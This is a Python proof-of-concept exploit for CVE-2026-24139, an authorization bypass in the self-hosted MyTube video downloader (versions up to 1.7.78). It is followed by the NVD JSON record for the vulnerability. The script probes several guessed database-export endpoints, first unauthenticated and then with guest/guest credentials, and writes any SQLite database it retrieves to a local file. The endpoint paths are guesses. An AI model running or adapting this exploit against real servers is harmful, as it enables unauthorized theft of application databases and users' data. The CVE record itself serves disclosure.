CVE-2026-24139

# CVE-2026-24139 PoC - MyTube Authorization Bypass # Target: MyTube <= 1.7.78 # Vulnerability: Database export endpoint lacks proper authorization check import requests import sys def exploit_mytube(target_url): """ Exploit authorization bypass in MyTube database export endpoint. Allows low-privileged or guest users to download the complete application database. """ # Database export endpoint - typically found via path enumeration export_endpoints = [ "/export/database", "/api/export/db", "/backup/database", "/api/database/download", "/admin/export/database" ] print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2026-24139: Authorization Bypass in MyTube") for endpoint in export_endpoints: url = target_url.rstrip('/') + endpoint # Try without authentication (guest access) print(f"\n[*] Testing endpoint: {url}") try: # Method 1: Direct unauthenticated request response = requests.get(url, timeout=10) if response.status_code == 200: # Check if response contains database content content_type = response.headers.get('Content-Type', '') content_length = len(response.content) # Database files typically have specific signatures if 'sqlite' in content_type.lower() or \ 'application/octet-stream' in content_type.lower() or \ response.content[:16].startswith(b'SQLite format 3'): print(f"[!] VULNERABLE! Database export found at {url}") print(f"[!] Content-Type: {content_type}") print(f"[!] Content-Length: {content_length} bytes") # Save the database output_file = f"mytube_db_{endpoint.replace('/', '_')}.sqlite" with open(output_file, 'wb') as f: f.write(response.content) print(f"[!] Database saved to: {output_file}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") continue # Method 2: Try with basic authentication (low-privileged user) print("\n[*] Trying with low-privileged credentials...") try: # Common default credentials or low-priv user auth = ('guest', 'guest') for endpoint in export_endpoints: url = target_url.rstrip('/') + endpoint response = requests.get(url, auth=auth, timeout=10) if response.status_code == 200 and response.content[:16].startswith(b'SQLite format 3'): print(f"[!] VULNERABLE with guest credentials!") output_file = f"mytube_db_auth_{endpoint.replace('/', '_')}.sqlite" with open(output_file, 'wb') as f: f.write(response.content) print(f"[!] Database saved to: {output_file}") return True except requests.exceptions.RequestException as e: print(f"[-] Authenticated request failed: {e}") print("\n[-] Exploit completed. No vulnerable endpoint found or database not accessible.") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2026_24139_poc.py <target_url>") print("Example: python cve_2026_24139_poc.py http://target.com:8080") sys.exit(1) target = sys.argv[1] exploit_mytube(target)

{"cve": {"id": "CVE-2026-24139", "sourceIdentifier": "[email protected]", "published": "2026-01-24T00:15:49.313", "lastModified": "2026-02-02T13:26:40.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MyTube is a self-hosted downloader and player for several video websites. Versions 1.7.78 and below do not safeguard against authorization bypass, allowing guest users to download the complete application database. The application fails to properly validate user permissions on the database export endpoint, enabling low-privileged users to access sensitive data they should not have permission to view."}, {"lang": "es", "value": "MyTube es un descargador y reproductor autoalojado para varios sitios web de video. Las versiones 1.7.78 e inferiores no protegen contra la omisión de autorización, permitiendo a los usuarios invitados descargar la base de datos completa de la aplicación. La aplicación no valida correctamente los permisos de usuario en el punto final de exportación de la base de datos, permitiendo a los usuarios con bajos privilegios acceder a datos sensibles a los que no deberían tener permiso para ver."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:franklioxygen:mytube:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.78", "matchCriteriaId": "5F5D04C2-9BCE-4945-BC56-3532544A03D7"}]}]}], "references": [{"url": "https://github.com/franklioxygen/MyTube/commit/e271775e27d51b26e54731b7b874447f47a1f280", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/franklioxygen/MyTube/security/advisories/GHSA-hhc3-8q8c-89q7", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}